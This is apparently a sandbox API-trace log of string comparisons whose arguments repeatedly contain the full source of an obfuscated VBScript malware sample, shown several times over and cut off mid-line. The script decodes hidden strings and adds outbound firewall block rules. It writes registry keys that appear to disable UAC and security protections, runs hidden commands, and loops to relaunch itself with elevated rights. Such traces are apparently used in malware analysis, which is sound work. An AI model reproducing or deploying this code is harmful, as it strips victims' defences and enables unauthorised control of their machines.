wcsncmp (_String1="\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.942] wcsncmp (_String1="\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.942] wcsncmp (_String1="s1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.942] wcsncmp (_String1="1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.942] wcsncmp (_String1=" = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = 